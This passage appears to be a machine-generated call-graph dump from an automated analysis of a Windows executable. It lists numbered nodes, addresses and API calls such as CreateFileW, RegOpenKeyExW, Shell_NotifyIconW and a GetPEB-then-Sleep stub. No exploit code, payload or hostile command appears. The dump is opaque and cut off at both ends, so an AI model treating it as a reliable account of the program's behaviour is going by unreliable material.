102087->102171 102094 6c7e4e 102088->102094 102091 6c7df9 102172 6c7e22 LeaveCriticalSection __unlock_fhandle 102091->102172 102093 6c7db6 __write 102093->102077 102095 6c7e6e 102094->102095 102096 6b44ea __wsopen_nolock 58 API calls 102095->102096 102100 6c7e8a 102096->102100 102097 6c7fc1 102098 6b8dc6 __invoke_watson 8 API calls 102097->102098 102099 6c85a0 102098->102099 102102 6c7d85 __wsopen_helper 103 API calls 102099->102102 102100->102097 102101 6c7ec4 102100->102101 102112 6c7ee7 102100->102112 102103 6b8af4 __write 58 API calls 102101->102103 102104 6c85ba 102102->102104 102105 6c7ec9 102103->102105 102104->102091 102106 6b8b28 __write 58 API calls 102105->102106 102107 6c7ed6 102106->102107 102109 6b8db6 __write 9 API calls 102107->102109 102108 6c7fa5 102110 6b8af4 __write 58 API calls 102108->102110 102111 6c7ee0 102109->102111 102113 6c7faa 102110->102113 102111->102091 102112->102108 102117 6c7f83 102112->102117 102114 6b8b28 __write 58 API calls 102113->102114 102115 6c7fb7 102114->102115 102116 6b8db6 __write 9 API calls 102115->102116 102116->102097 102118 6bd294 __alloc_osfhnd 61 API calls 102117->102118 102119 6c8051 102118->102119 102120 6c807e 102119->102120 102121 6c805b 102119->102121 102123 6c7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 102120->102123 102122 6b8af4 __write 58 API calls 102121->102122 102124 6c8060 102122->102124 102131 6c80a0 102123->102131 102126 6b8b28 __write 58 API calls 102124->102126 102125 6c811e GetFileType 102129 6c8129 GetLastError 102125->102129 102130 6c816b 102125->102130 102128 6c806a 102126->102128 102127 6c80ec GetLastError 102132 6b8b07 __dosmaperr 58 API calls 102127->102132 102133 6b8b28 __write 58 API calls 102128->102133 102134 6b8b07 __dosmaperr 58 API calls 102129->102134 102139 6bd52a __set_osfhnd 59 API calls 102130->102139 102131->102125 102131->102127 102135 6c7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 102131->102135 102136 6c8111 102132->102136 102133->102111 102137 6c8150 CloseHandle 102134->102137 102138 6c80e1 102135->102138 102143 6b8b28 __write 58 API calls 102136->102143 102137->102136 102140 6c815e 102137->102140 102138->102125 102138->102127 102142 6c8189 102139->102142 102141 6b8b28 __write 58 API calls 102140->102141 102144 6c8163 102141->102144 102145 6c8344 102142->102145 102146 6c18c1 __lseeki64_nolock 60 API calls 102142->102146 102162 6c820a 102142->102162 102143->102097 102144->102136 102145->102097 102147 6c8517 CloseHandle 102145->102147 102148 6c81f3 102146->102148 102149 6c7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 102147->102149 102152 6b8af4 __write 58 API calls 102148->102152 102163 6c8212 102148->102163 102151 6c853e 102149->102151 102150 6c0e5b 70 API calls __read_nolock 102150->102163 102153 6c83ce 102151->102153 102154 6c8546 GetLastError 102151->102154 102152->102162 102153->102097 102155 6b8b07 __dosmaperr 58 API calls 102154->102155 102156 6c8552 102155->102156 102158 6bd43d __free_osfhnd 59 API calls 102156->102158 102157 6c0add __close_nolock 61 API calls 102157->102163 102158->102153 102159 6c97a2 __chsize_nolock 82 API calls 102159->102163 102160 6c18c1 60 API calls __lseeki64_nolock 102160->102162 102161 6bd886 __write 78 API calls 102161->102162 102162->102145 102162->102160 102162->102161 102162->102163 102163->102150 102163->102157 102163->102159 102163->102162 102164 6c83c1 102163->102164 102165 6c83aa 102163->102165 102169 6c18c1 60 API calls __lseeki64_nolock 102163->102169 102166 6c0add __close_nolock 61 API calls 102164->102166 102165->102145 102167 6c83c8 102166->102167 102168 6b8b28 __write 58 API calls 102167->102168 102168->102153 102169->102163 102170->102087 102171->102093 102172->102093 102174 694b83 102173->102174 102175 694c3f LoadLibraryA 102173->102175 102174->101927 102174->101930 102175->102174 102176 694c50 GetProcAddress 102175->102176 102176->102174 102178 6b0db6 Mailbox 59 API calls 102177->102178 102179 695240 102178->102179 102179->101935 102181 694ea3 FindResourceExW 102180->102181 102185 694ec0 102180->102185 102182 6cd933 LoadResource 102181->102182 102181->102185 102183 6cd948 SizeofResource 102182->102183 102182->102185 102184 6cd95c LockResource 102183->102184 102183->102185 102184->102185 102185->101936 102187 6cd9ab 102186->102187 102188 694ef4 102186->102188 102192 6b584d 102188->102192 102190 694f02 102190->101942 102191->101936 102194 6b5859 __write 102192->102194 102193 6b586b 102205 6b8b28 58 API calls __getptd_noexit 102193->102205 102194->102193 102196 6b5891 102194->102196 102207 6b6c11 102196->102207 102197 6b5870 102206 6b8db6 9 API calls __write 102197->102206 102202 6b58a6 102214 6b58c8 LeaveCriticalSection LeaveCriticalSection __wfsopen 102202->102214 102204 6b587b __write 102204->102190 102205->102197 102206->102204 102208 6b6c43 EnterCriticalSection 102207->102208 102209 6b6c21 102207->102209 102211 6b5897 102208->102211 102209->102208 102210 6b6c29 102209->102210 102212 6b9c0b __lock 58 API calls 102210->102212 102213 6b57be 83 API calls 4 library calls 102211->102213 102212->102211 102213->102202 102214->102204 102218 6b55fd 102215->102218 102217 694f2e 102217->101955 102219 6b5609 __write 102218->102219 102220 6b561f _memset 102219->102220 102221 6b564c 102219->102221 102222 6b5644 __write 102219->102222 102231 6b8b28 58 API calls __getptd_noexit 102220->102231 102223 6b6c11 __lock_file 59 API calls 102221->102223 102222->102217 102224 6b5652 102223->102224 102233 6b541d 72 API calls 6 library calls 102224->102233 102226 6b5639 102232 6b8db6 9 API calls __write 102226->102232 102229 6b5668 102234 6b5686 LeaveCriticalSection LeaveCriticalSection __wfsopen 102229->102234 102231->102226 102232->102222 102233->102229 102234->102222 102238 6b520a GetSystemTimeAsFileTime 102235->102238 102237 6f8f6e 102237->101957 102239 6b5238 __aulldiv 102238->102239 102239->102237 102241 6b5c6c __write 102240->102241 102242 6b5c7e 102241->102242 102243 6b5c93 102241->102243 102254 6b8b28 58 API calls __getptd_noexit 102242->102254 102244 6b6c11 __lock_file 59 API calls 102243->102244 102246 6b5c99 102244->102246 102256 6b58d0 67 API calls 4 library calls 102246->102256 102247 6b5c83 102255 6b8db6 9 API calls __write 102247->102255 102250 6b5ca4 102257 6b5cc4 LeaveCriticalSection LeaveCriticalSection __wfsopen 102250->102257 102252 6b5cb6 102253 6b5c8e __write 102252->102253 102253->101961 102254->102247 102255->102253 102256->102250 102257->102252 102259 697da6 102258->102259 102261 697d99 102258->102261 102260 6b0db6 Mailbox 59 API calls 102259->102260 102260->102261 102261->101759 102262->101786 102263->101832 102264->101834 102265->101885 102267 6b486f __write 102266->102267 102268 6b488d 102267->102268 102269 6b48a5 102267->102269 102271 6b489d __write 102267->102271 102316 6b8b28 58 API calls __getptd_noexit 102268->102316 102272 6b6c11 __lock_file 59 API calls 102269->102272 102271->101896 102274 6b48ab 102272->102274 102273 6b4892 102317 6b8db6 9 API calls __write 102273->102317 102304 6b470a 102274->102304 102280 6b53b2 __write 102279->102280 102281 6b53de 102280->102281 102282 6b53c6 102280->102282 102285 6b6c11 __lock_file 59 API calls 102281->102285 102288 6b53d6 __write 102281->102288 102499 6b8b28 58 API calls __getptd_noexit 102282->102499 102284 6b53cb 102500 6b8db6 9 API calls __write 102284->102500 102287 6b53f0 102285->102287 102483 6b533a 102287->102483 102288->101889 102297 6f9748 __tzset_nolock _wcscmp 102295->102297 102296 6f9109 GetSystemTimeAsFileTime 102296->102297 102297->102296 102298 694f0b 74 API calls 102297->102298 102299 6f9210 102297->102299 102300 694ee5 85 API calls 102297->102300 102298->102297 102299->101866 102301 6b40fb 58 API calls __wsplitpath_helper 102299->102301 102300->102297 102301->101868 102302->101876 102307 6b4719 102304->102307 102313 6b4737 102304->102313 102305 6b4727 102307->102305 102310 6b4751 _memmove 102307->102310 102307->102313 102310->102313 102318 6b48dd LeaveCriticalSection LeaveCriticalSection __wfsopen 102313->102318 102316->102273 102317->102271 102318->102271 102484 6b5349 102483->102484 102485 6b535d 102483->102485 102499->102284 102500->102288 102578 6f3c3e 102577->102578 102579 6f4475 FindFirstFileW 102577->102579 102578->101535 102579->102578 102580 6f448a FindClose 102579->102580 102580->102578 102582 69818f 102581->102582 102585 6981aa 102581->102585 102583 697e4f 59 API calls 102582->102583 102584 698197 CharUpperBuffW 102583->102584 102584->102585 102585->101544 102587 69f251 102586->102587 102589 69f272 102587->102589 102714 6f9e4a 89 API calls 4 library calls 102587->102714 102589->101586 102591 6cedbd 102590->102591 102592 69838d 102590->102592 102593 6b0db6 Mailbox 59 API calls 102592->102593 102594 698394 102593->102594 102595 6983b5 102594->102595 102715 698634 59 API calls Mailbox 102594->102715 102595->101561 102595->101568 102598 6d4cc3 102597->102598 102609 6a09f5 102597->102609 102762 6f9e4a 89 API calls 4 library calls 102598->102762 102600 6a0cfa 102600->101593 102602 6a0ee4 102602->102600 102604 6a0ef1 102602->102604 102760 6a1093 331 API calls Mailbox 102604->102760 102605 6a0a4b PeekMessageW 102673 6a0a05 Mailbox 102605->102673 102608 6a0ef8 LockWindowUpdate DestroyWindow GetMessageW 102608->102600 102611 6a0f2a 102608->102611 102609->102673 102763 699e5d 60 API calls 102609->102763 102764 6e6349 331 API calls 102609->102764 102610 6d4e81 Sleep 102610->102673 102614 6d5c58 TranslateMessage DispatchMessageW GetMessageW 102611->102614 102612 6a0ce4 102612->102600 102759 6a1070 10 API calls Mailbox 102612->102759 102614->102614 102615 6d5c88 102614->102615 102615->102600 102616 6a0e43 PeekMessageW 102616->102673 102617 6a0ea5 TranslateMessage DispatchMessageW 102617->102616 102618 6d4d50 TranslateAcceleratorW 102618->102616 102618->102673 102620 6b0db6 59 API calls Mailbox 102620->102673 102621 6a0d13 timeGetTime 102621->102673 102622 6d581f WaitForSingleObject 102626 6d583c GetExitCodeProcess CloseHandle 102622->102626 102622->102673 102623 6a0e5f Sleep 102658 6a0e70 Mailbox 102623->102658 102624 698047 59 API calls 102624->102673 102625 697667 59 API calls 102625->102658 102657 6a0f95 102626->102657 102627 6d5af8 Sleep 102627->102658 102629 69b73c 304 API calls 102629->102673 102631 6b049f timeGetTime 102631->102658 102632 6a0f4e timeGetTime 102761 699e5d 60 API calls 102632->102761 102635 6d5b8f GetExitCodeProcess 102637 6d5bbb CloseHandle 102635->102637 102638 6d5ba5 WaitForSingleObject 102635->102638 102636 699837 84 API calls 102636->102673 102637->102658 102638->102637 102638->102673 102641 715f25 110 API calls 102641->102658 102642 69b7dd 109 API calls 102642->102658 102643 699e5d 60 API calls 102643->102673 102644 6d5874 102644->102657 102645 6d5c17 Sleep 102645->102673 102646 6d5078 Sleep 102646->102673 102648 697de1 59 API calls 102648->102658 102653 69f460 304 API calls 102653->102673 102654 69fce0 304 API calls 102654->102673 102657->101593 102658->102625 102658->102631 102658->102635 102658->102641 102658->102642 102658->102644 102658->102645 102658->102646 102658->102648 102658->102657 102658->102673 102770 6f2408 60 API calls 102658->102770 102771 699e5d 60 API calls 102658->102771 102772 6989b3 69 API calls Mailbox 102658->102772 102773 69b73c 331 API calls 102658->102773 102774 6e64da 60 API calls 102658->102774 102775 6f5244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 102658->102775 102776 6f3c55 66 API calls Mailbox 102658->102776 102659 6f9e4a 89 API calls 102659->102673 102661 699c90 59 API calls Mailbox 102661->102673 102662 699ea0 304 API calls 102662->102673 102663 6984c0 69 API calls 102663->102673 102664 6982df 59 API calls 102664->102673 102665 6989b3 69 API calls 102665->102673 102666 6e617e 59 API calls Mailbox 102666->102673 102667 6d55d5 VariantClear 102667->102673 102668 6d566b VariantClear 102668->102673 102669 698cd4 59 API calls Mailbox 102669->102673 102670 6d5419 VariantClear 102670->102673 102671 6e6e8f 59 API calls 102671->102673 102672 697de1 59 API calls 102672->102673 102673->102605 102673->102610 102673->102612 102673->102616 102673->102617 102673->102618 102673->102620 102673->102621 102673->102622 102673->102623 102673->102624 102673->102627 102673->102629 102673->102632 102673->102636 102673->102643 102673->102653 102673->102654 102673->102657 102673->102658 102673->102659 102673->102661 102673->102662 102673->102663 102673->102664 102673->102665 102673->102666 102673->102667 102673->102668 102673->102669 102673->102670 102673->102671 102673->102672 102716 69e420 102673->102716 102723 69e6a0 102673->102723 102754 6931ce 102673->102754 102765 716018 59 API calls 102673->102765 102766 6f9a15 59 API calls Mailbox 102673->102766 102767 6ed4f2 59 API calls 102673->102767 102768 6e60ef 59 API calls 2 library calls 102673->102768 102769 698401 59 API calls 102673->102769 102675 6ceda1 102674->102675 102678 6982f2 102674->102678 102676 6cedb1 102675->102676 102822 6e61a4 59 API calls 102675->102822 102679 69831c 102678->102679 102680 6985c0 59 API calls 102678->102680 102682 698339 Mailbox 102678->102682 102681 698322 102679->102681 102683 6985c0 59 API calls 102679->102683 102680->102679 102681->102682 102684 699c90 Mailbox 59 API calls 102681->102684 102682->101587 102683->102681 102684->102682 102685->101585 102686->101585 102687->101545 102688->101601 102689->101554 102690->101601 102691->101601 102692->101560 102693->101569 102694->101570 102695->101570 102697 6985ce 102696->102697 102702 6985f6 102696->102702 102698 6985dc 102697->102698 102699 6985c0 59 API calls 102697->102699 102700 6985e2 102698->102700 102701 6985c0 59 API calls 102698->102701 102699->102698 102700->102702 102703 699c90 Mailbox 59 API calls 102700->102703 102701->102700 102702->101567 102703->102702 102704->101585 102705->101585 102706->101585 102708 6984cb 102707->102708 102709 6984f2 102708->102709 102823 6989b3 69 API calls Mailbox 102708->102823 102709->101600 102711->101601 102712->101583 102713->101601 102714->102589 102715->102595 102717 69e43d 102716->102717 102719 69e451 102716->102719 102777 69df00 331 API calls 2 library calls 102717->102777 102778 6f9e4a 89 API calls 4 library calls 102719->102778 102720 69e448 102720->102673 102722 6d3aa4 102722->102722 102724 69e6d5 102723->102724 102725 6d3aa9 102724->102725 102728 69e73f 102724->102728 102737 69e799 102724->102737 102726 699ea0 331 API calls 102725->102726 102727 6d3abe 102726->102727 102753 69e970 Mailbox 102727->102753 102780 6f9e4a 89 API calls 4 library calls 102727->102780 102730 697667 59 API calls 102728->102730 102728->102737 102729 697667 59 API calls 102729->102737 102732 6d3b04 102730->102732 102781 6b2d40 102732->102781 102733 6b2d40 __cinit 67 API calls 102733->102737 102735 6d3b26 102735->102673 102736 6984c0 69 API calls 102736->102753 102737->102729 102737->102733 102737->102735 102738 69e95a 102737->102738 102737->102753 102738->102753 102784 6f9e4a 89 API calls 4 library calls 102738->102784 102739 699ea0 331 API calls 102739->102753 102742 699c90 Mailbox 59 API calls 102742->102753 102743 6f9e4a 89 API calls 102743->102753 102747 698d40 59 API calls 102747->102753 102750 6d3e25 102750->102673 102751 69f195 102788 6f9e4a 89 API calls 4 library calls 102751->102788 102752 69ea78 102752->102673 102753->102736 102753->102739 102753->102742 102753->102743 102753->102747 102753->102751 102753->102752 102779 697f77 59 API calls 2 library calls 102753->102779 102785 6e6e8f 59 API calls 102753->102785 102786 70c5c3 331 API calls 102753->102786 102787 70b53c 331 API calls Mailbox 102753->102787 102789 7093c6 331 API calls Mailbox 102753->102789 102755 693212 102754->102755 102756 6931e0 102754->102756 102755->102673 102756->102755 102757 693205 IsDialogMessageW 102756->102757 102758 6ccf32 GetClassLongW 102756->102758 102757->102755 102757->102756 102758->102756 102758->102757 102759->102602 102760->102608 102761->102673 102762->102609 102763->102609 102764->102609 102765->102673 102766->102673 102767->102673 102768->102673 102769->102673 102770->102658 102771->102658 102772->102658 102773->102658 102774->102658 102775->102658 102776->102658 102777->102720 102778->102722 102779->102753 102780->102753 102790 6b2c44 102781->102790 102783 6b2d4b 102783->102737 102784->102753 102785->102753 102786->102753 102787->102753 102788->102750 102789->102753 102791 6b2c50 __write 102790->102791 102798 6b3217 102791->102798 102797 6b2c77 __write 102797->102783 102799 6b9c0b __lock 58 API calls 102798->102799 102800 6b2c59 102799->102800 102801 6b2c88 DecodePointer DecodePointer 102800->102801 102802 6b2c65 102801->102802 102803 6b2cb5 102801->102803 102812 6b2c82 102802->102812 102803->102802 102815 6b87a4 59 API calls __write 102803->102815 102805 6b2d18 EncodePointer EncodePointer 102805->102802 102806 6b2cec 102806->102802 102811 6b2d06 EncodePointer 102806->102811 102817 6b8864 61 API calls 2 library calls 102806->102817 102807 6b2cc7 102807->102805 102807->102806 102816 6b8864 61 API calls 2 library calls 102807->102816 102810 6b2d00 102810->102802 102810->102811 102811->102805 102818 6b3220 102812->102818 102815->102807 102816->102806 102817->102810 102821 6b9d75 LeaveCriticalSection 102818->102821 102820 6b2c87 102820->102797 102821->102820 102822->102676 102823->102709 102825 6e60cb 102824->102825 102826 6e60e8 102824->102826 102825->102826 102828 6e60ab 59 API calls Mailbox 102825->102828 102826->101174 102828->102825 102829->101181 102830->101193 102831->101193 102832->101199 102833 6d416f 102837 6e5fe6 102833->102837 102835 6d417a 102836 6e5fe6 85 API calls 102835->102836 102836->102835 102838 6e6020 102837->102838 102844 6e5ff3 102837->102844 102838->102835 102839 6e6022 102849 699328 84 API calls Mailbox 102839->102849 102840 6e6027 102842 699837 84 API calls 102840->102842 102843 6e602e 102842->102843 102845 697b2e 59 API calls 102843->102845 102844->102838 102844->102839 102844->102840 102846 6e601a 102844->102846 102845->102838 102848 6995a0 59 API calls _wcsstr 102846->102848 102848->102838 102849->102840 102850 69e5ab 102853 69d100 102850->102853 102852 69e5b9 102854 69d11d 102853->102854 102870 69d37d 102853->102870 102855 6d2691 102854->102855 102856 6d26e0 102854->102856 102876 69d144 102854->102876 102857 6d2694 102855->102857 102866 6d26af 102855->102866 102897 70a3e6 331 API calls __cinit 102856->102897 102860 6d26a0 102857->102860 102857->102876 102895 70a9fa 331 API calls 102860->102895 102863 6b2d40 __cinit 67 API calls 102863->102876 102864 6d28b5 102864->102864 102865 69d54b 102865->102852 102866->102870 102896 70aea2 331 API calls 3 library calls 102866->102896 102867 69d434 102889 698a52 68 API calls 102867->102889 102870->102865 102901 6f9e4a 89 API calls 4 library calls 102870->102901 102872 69d443 102872->102852 102873 6d27fc 102900 70a751 89 API calls 102873->102900 102876->102863 102876->102865 102876->102867 102876->102870 102876->102873 102878 6984c0 69 API calls 102876->102878 102882 699d3c 60 API calls 102876->102882 102884 699ea0 331 API calls 102876->102884 102885 698047 59 API calls 102876->102885 102887 698740 68 API calls __cinit 102876->102887 102888 698542 68 API calls 102876->102888 102890 69843a 68 API calls 102876->102890 102891 69cf7c 331 API calls 102876->102891 102892 699dda 59 API calls Mailbox 102876->102892 102893 69cf00 89 API calls 102876->102893 102894 69cd7d 331 API calls 102876->102894 102898 698a52 68 API calls 102876->102898 102899 6e678d 60 API calls 102876->102899 102878->102876 102882->102876 102884->102876 102885->102876 102887->102876 102888->102876 102889->102872 102890->102876 102891->102876 102892->102876 102893->102876 102894->102876 102895->102865 102896->102870 102897->102876 102898->102876 102899->102876 102900->102870 102901->102864 102902 69107d 102907 69708b 102902->102907 102904 69108c 102905 6b2d40 __cinit 67 API calls 102904->102905 102906 691096 102905->102906 102908 69709b __write_nolock 102907->102908 102909 697667 59 API calls 102908->102909 102910 697151 102909->102910 102938 694706 102910->102938 102912 69715a 102945 6b050b 102912->102945 102915 697cab 59 API calls 102916 697173 102915->102916 102951 693f74 102916->102951 102919 697667 59 API calls 102920 69718b 102919->102920 102921 697d8c 59 API calls 102920->102921 102922 697194 RegOpenKeyExW 102921->102922 102923 6ce8b1 RegQueryValueExW 102922->102923 102924 6971b6 Mailbox 102922->102924 102925 6ce8ce 102923->102925 102926 6ce943 RegCloseKey 102923->102926 102924->102904 102927 6b0db6 Mailbox 59 API calls 102925->102927 102926->102924 102937 6ce955 _wcscat Mailbox __wsetenvp 102926->102937 102928 6ce8e7 102927->102928 102929 69522e 59 API calls 102928->102929 102930 6ce8f2 RegQueryValueExW 102929->102930 102931 6ce90f 102930->102931 102934 6ce929 102930->102934 102932 697bcc 59 API calls 102931->102932 102932->102934 102933 6979f2 59 API calls 102933->102937 102934->102926 102935 697de1 59 API calls 102935->102937 102936 693f74 59 API calls 102936->102937 102937->102924 102937->102933 102937->102935 102937->102936 102957 6c1940 102938->102957 102941 697de1 59 API calls 102942 694739 102941->102942 102959 694750 102942->102959 102944 694743 Mailbox 102944->102912 102946 6c1940 __write_nolock 102945->102946 102947 6b0518 GetFullPathNameW 102946->102947 102948 6b053a 102947->102948 102949 697bcc 59 API calls 102948->102949 102950 697165 102949->102950 102950->102915 102952 693f82 102951->102952 102956 693fa4 _memmove 102951->102956 102955 6b0db6 Mailbox 59 API calls 102952->102955 102953 6b0db6 Mailbox 59 API calls 102954 693fb8 102953->102954 102954->102919 102955->102956 102956->102953 102958 694713 GetModuleFileNameW 102957->102958 102958->102941 102960 6c1940 __write_nolock 102959->102960 102961 69475d GetFullPathNameW 102960->102961 102962 694799 102961->102962 102963 69477c 102961->102963 102964 697d8c 59 API calls 102962->102964 102965 697bcc 59 API calls 102963->102965 102966 694788 102964->102966 102965->102966 102969 697726 102966->102969 102970 697734 102969->102970 102971 697d2c 59 API calls 102970->102971 102972 694794 102971->102972 102972->102944 102973 d52fd0 102987 d50c20 102973->102987 102975 d5309c 102990 d52ec0 102975->102990 102993 d540c0 GetPEB 102987->102993 102989 d512ab 102989->102975 102991 d52ec9 Sleep 102990->102991 102992 d52ed7 102991->102992 102994 d540ea 102993->102994 102994->102989 102995 693633 102996 69366a 102995->102996 102997 693688 102996->102997 102998 6936e7 102996->102998 103036 6936e5 102996->103036 102999 69374b PostQuitMessage 102997->102999 103000 693695 102997->103000 103002 6cd0cc 102998->103002 103003 6936ed 102998->103003 103027 6936d8 102999->103027 103007 6cd154 103000->103007 103008 6936a0 103000->103008 103001 6936ca DefWindowProcW 103001->103027 103050 6a1070 10 API calls Mailbox 103002->103050 103004 6936f2 103003->103004 103005 693715 SetTimer RegisterWindowMessageW 103003->103005 103009 6936f9 KillTimer 103004->103009 103010 6cd06f 103004->103010 103012 69373e CreatePopupMenu 103005->103012 103005->103027 103066 6f2527 71 API calls _memset 103007->103066 103013 6936a8 103008->103013 103014 693755 103008->103014 103047 69443a Shell_NotifyIconW _memset 103009->103047 103020 6cd0a8 MoveWindow 103010->103020 103021 6cd074 103010->103021 103011 6cd0f3 103051 6a1093 331 API calls Mailbox 103011->103051 103012->103027 103018 6936b3 103013->103018 103023 6cd139 103013->103023 103040 6944a0 103014->103040 103024 6936be 103018->103024 103025 6cd124 103018->103025 103020->103027 103028 6cd078 103021->103028 103029 6cd097 SetFocus 103021->103029 103022 69370c 103048 693114 DeleteObject DestroyWindow Mailbox 103022->103048 103023->103001 103065 6e7c36 59 API calls Mailbox 103023->103065 103024->103001 103052 69443a Shell_NotifyIconW _memset 103024->103052 103064 6f2d36 81 API calls _memset 103025->103064 103026 6cd166 103026->103001 103026->103027 103028->103024 103033 6cd081 103028->103033 103029->103027 103049 6a1070 10 API calls Mailbox 103033->103049 103035 6cd134 103035->103027 103036->103001 103038 6cd118 103053 69434a 103038->103053 103041 694539 103040->103041 103042 6944b7 _memset 103040->103042 103041->103027 103067 69407c 103042->103067 103044 694522 KillTimer SetTimer 103044->103041 103045 6cd4ab Shell_NotifyIconW 103045->103044 103046 6944de 103046->103044 103046->103045 103047->103022 103048->103027 103049->103027 103050->103011 103051->103024 103052->103038 103054 694375 _memset 103053->103054 103089 694182 103054->103089 103057 6943fa 103059 694430 Shell_NotifyIconW 103057->103059 103060 694414 Shell_NotifyIconW 103057->103060 103061 694422 103059->103061 103060->103061 103062 69407c 61 API calls 103061->103062 103063 694429 103062->103063 103063->103036 103064->103035 103065->103036 103066->103026 103068 694098 103067->103068 103069 69416f Mailbox 103067->103069 103070 697a16 59 API calls 103068->103070 103069->103046 103071 6940a6 103070->103071 103072 6cd3c8 LoadStringW 103071->103072 103073 6940b3 103071->103073 103075 6cd3e2 103072->103075 103074 697bcc 59 API calls 103073->103074 103076 6940c8 103074->103076 103078 697b2e 59 API calls 103075->103078 103076->103075 103077 6940d9 103076->103077 103079 6940e3 103077->103079 103080 694174 103077->103080 103083 6cd3ec 103078->103083 103081 697b2e 59 API calls 103079->103081 103082 698047 59 API calls 103080->103082 103085 6940ed _memset _wcscpy 103081->103085 103082->103085 103084 697cab 59 API calls 103083->103084 103083->103085 103086 6cd40e 103084->103086 103087 694155 Shell_NotifyIconW 103085->103087 103088 697cab 59 API calls 103086->103088 103087->103069 103088->103085 103090 6cd423 103089->103090 103091 694196 103089->103091 103090->103091 103092 6cd42c DestroyIcon 103090->103092 103091->103057 103093 6f2f94 62 API calls _W_store_winword 103091->103093 103092->103091 103093->103057 103094 6cfe27 103107 6af944 103094->103107 103096 6cfe3d 103097 6cfebe 103096->103097 103098 6cfe53 103096->103098 103102 69fce0 331 API calls 103097->103102 103116 699e5d 60 API calls 103098->103116 103100 6cfe92 103101 6d089c 103100->103101 103104 6cfe9a 103100->103104 103118 6f9e4a 89 API calls 4 library calls 103101->103118 103106 6cfeb2 Mailbox 103102->103106 103117 6f834f 59 API calls Mailbox 103104->103117 103106->103106 103108 6af962 103107->103108 103109 6af950 103107->103109 103111 6af968 103108->103111 103112 6af991 103108->103112 103110 699d3c 60 API calls 103109->103110 103115 6af95a 103110->103115 103114 6b0db6 Mailbox 59 API calls 103111->103114 103113 699d3c 60 API calls 103112->103113 103113->103115 103114->103115 103115->103096 103116->103100 103117->103106 103118->103106 103119 691055 103124 692649 103119->103124 103122 6b2d40 __cinit 67 API calls 103123 691064 103122->103123 103125 697667 59 API calls 103124->103125 103126 6926b7 103125->103126 103131 693582 103126->103131 103129 692754 103130 69105a 103129->103130 103134 693416 59 API calls 2 library calls 103129->103134 103130->103122 103135 6935b0 103131->103135 103134->103129 103136 6935bd 103135->103136 103137 6935a1 103135->103137 103136->103137 103138 6935c4 RegOpenKeyExW 103136->103138 103137->103129 103138->103137 103139 6935de RegQueryValueExW 103138->103139 103140 6935ff 103139->103140 103141 693614 RegCloseKey 103139->103141 103140->103141 103141->103137 103142 6b7c56 103143 6b7c62 __write 103142->103143 103179 6b9e08 GetStartupInfoW 103143->103179 103146 6b7c67 103181 6b8b7c GetProcessHeap 103146->103181 103147 6b7cbf 103148 6b7cca 103147->103148 103264 6b7da6 58 API calls 3 library calls 103147->103264 103182 6b9ae6 103148->103182 103151 6b7cd0 103153 6b7cdb __RTC_Initialize 103151->103153 103265 6b7da6 58 API calls 3 library calls 103151->103265 103203 6bd5d2 103153->103203 103155 6b7cea 103156 6b7cf6 GetCommandLineW 103155->103156 103266 6b7da6 58 API calls 3 library calls 103155->103266 103222 6c4f23 GetEnvironmentStringsW 103156->103222 103159 6b7cf5 103159->103156 103162 6b7d10 103163 6b7d1b 103162->103163 103267 6b30b5 58 API calls 3 library calls 103162->103267 103232 6c4d58 103163->103232 103166 6b7d21 103167 6b7d2c 103166->103167 103268 6b30b5 58 API calls 3 library calls 103166->103268 103246 6b30ef 103167->103246 103170 6b7d34 103171 6b7d3f __wwincmdln 103170->103171 103269 6b30b5 58 API calls 3 library calls 103170->103269 103252 6947d0 103171->103252 103174 6b7d53 103175 6b7d62 103174->103175 103270 6b3358 58 API calls _doexit 103174->103270 103271 6b30e0 58 API calls _doexit 103175->103271 103178 6b7d67 __write 103180 6b9e1e 103179->103180 103180->103146 103181->103147 103272 6b3187 36 API calls 2 library calls 103182->103272 103184 6b9aeb 103273 6b9d3c InitializeCriticalSectionAndSpinCount __alloc_osfhnd 103184->103273 103186 6b9af0 103187 6b9af4 103186->103187 103275 6b9d8a TlsAlloc 103186->103275 103274 6b9b5c 61 API calls 2 library calls 103187->103274 103190 6b9af9 103190->103151 103191 6b9b06 103191->103187 103192 6b9b11 103191->103192 103276 6b87d5 103192->103276 103194 6b9b53 103284 6b9b5c 61 API calls 2 library calls 103194->103284 103198 6b9b32 103198->103194 103200 6b9b38 103198->103200 103199 6b9b58 103199->103151 103283 6b9a33 58 API calls 4 library calls 103200->103283 103202 6b9b40 GetCurrentThreadId 103202->103151 103204 6bd5de __write 103203->103204 103205 6b9c0b __lock 58 API calls 103204->103205 103206 6bd5e5 103205->103206 103207 6b87d5 __calloc_crt 58 API calls 103206->103207 103209 6bd5f6 103207->103209 103208 6bd661 GetStartupInfoW 103216 6bd676 103208->103216 103217 6bd7a5 103208->103217 103209->103208 103210 6bd601 __write @_EH4_CallFilterFunc@8 103209->103210 103210->103155 103211 6bd86d 103298 6bd87d LeaveCriticalSection _doexit 103211->103298 103213 6b87d5 __calloc_crt 58 API calls 103213->103216 103214 6bd7f2 GetStdHandle 103214->103217 103215 6bd805 GetFileType 103215->103217 103216->103213 103216->103217 103219 6bd6c4 103216->103219 103217->103211 103217->103214 103217->103215 103297 6b9e2b InitializeCriticalSectionAndSpinCount 103217->103297 103218 6bd6f8 GetFileType 103218->103219 103219->103217 103219->103218 103296 6b9e2b InitializeCriticalSectionAndSpinCount 103219->103296 103223 6b7d06 103222->103223 103224 6c4f34 103222->103224 103228 6c4b1b GetModuleFileNameW 103223->103228 103299 6b881d 58 API calls 2 library calls 103224->103299 103226 6c4f70 FreeEnvironmentStringsW 103226->103223 103227 6c4f5a _memmove 103227->103226 103229 6c4b4f _wparse_cmdline 103228->103229 103231 6c4b8f _wparse_cmdline 103229->103231 103300 6b881d 58 API calls 2 library calls 103229->103300 103231->103162 103233 6c4d71 __wsetenvp 103232->103233 103237 6c4d69 103232->103237 103234 6b87d5 __calloc_crt 58 API calls 103233->103234 103242 6c4d9a __wsetenvp 103234->103242 103235 6c4df1 103236 6b2d55 _free 58 API calls 103235->103236 103236->103237 103237->103166 103238 6b87d5 __calloc_crt 58 API calls 103238->103242 103239 6c4e16 103241 6b2d55 _free 58 API calls 103239->103241 103241->103237 103242->103235 103242->103237 103242->103238 103242->103239 103243 6c4e2d 103242->103243 103301 6c4607 58 API calls __write 103242->103301 103302 6b8dc6 IsProcessorFeaturePresent 103243->103302 103245 6c4e39 103245->103166 103248 6b30fb __IsNonwritableInCurrentImage 